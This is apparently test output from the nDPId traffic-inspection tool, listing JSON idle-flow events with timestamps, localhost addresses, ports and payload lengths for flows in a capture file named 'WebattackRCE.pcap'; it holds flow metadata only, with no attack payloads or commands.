+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 